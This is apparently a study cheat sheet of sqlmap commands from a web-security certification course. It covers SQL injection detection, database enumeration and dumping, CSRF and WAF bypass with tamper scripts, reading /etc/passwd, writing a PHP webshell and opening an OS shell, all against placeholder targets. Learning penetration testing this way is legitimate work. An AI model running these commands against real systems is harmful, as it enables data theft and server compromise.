KagisoSec_
Misc & payloads
WEB

SQLMap Essentials

SQLMap from the CWES path: GET/POST/cookie/header injection, enumeration and dumping, request files, CSRF handling, WAF bypass with tamper scripts, file read/write, and --os-shell. Every command separated.

web sqlmap sql-injection cwes

Basic scan

Auto-detect on a GET parameter:

sqlmap -u "http://IP/case1.php?id=1"

POST request (mark the injectable parameter with *):

sqlmap "http://www.example.com/" --data 'uid=1*&name=test'

Load a saved Burp request file:

sqlmap -r req.txt

Add a session cookie:

sqlmap -r req.txt --cookie='PHPSESSID=ab4530f4a7d10448457fa8b0eadac29c'

Inject via a cookie value:

sqlmap -u "http://TARGET/page" --cookie="session=abc123" -p session

Inject via a custom header:

sqlmap -u "http://TARGET/page" -H "X-Forwarded-For: *"

Enumeration

Banner, current user/DB, DBA status:

sqlmap -u "http://www.example.com/?id=1" --banner --current-user --current-db --is-dba

List databases:

sqlmap -u "http://TARGET/page?id=1" --dbs

List tables in a database:

sqlmap -u "http://IP/case1.php?id=1" --tables -D testdb

Dump a table:

sqlmap -u "http://IP/case1.php?id=1" --dump -T users -D testdb

Dump specific columns:

sqlmap -u "http://IP/case1.php?id=1" --dump -T users -D testdb -C name,surname

Dump everything except system DBs:

sqlmap -r req.txt --dump-all --exclude-sysdbs

Search for a column containing ‘pass’:

sqlmap -u "http://www.example.com/?id=1" --search -C pass

CSRF & WAF bypass

Anti-CSRF token (grab fresh each request):

sqlmap -u "http://www.example.com/" --data="id=1&csrf-token=XXXXX" --csrf-token="csrf-token"

Skip WAF detection + random agent:

sqlmap -u "..." --skip-waf --random-agent

Tamper scripts to obfuscate payloads:

sqlmap -r req.txt --tamper=space2comment,randomcase

Chunked encoding bypass:

sqlmap -r req.txt --chunked

Crank up thoroughness:

sqlmap -u "http://TARGET/page?id=1" --level=5 --risk=3

File access & RCE

Read a server file:

sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd"

Write a webshell:

sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"

Interactive OS shell:

sqlmap -u "http://www.example.com/?id=1" --os-shell

Force error-based when os-shell fails:

sqlmap -u "http://www.example.com/?id=1" --os-shell --technique=E

Comprehensive dump template

sqlmap -r req.txt --dump --batch --technique=BEUSTQ -D <db> -T <table> --tamper=space2comment --no-cast --time-sec=3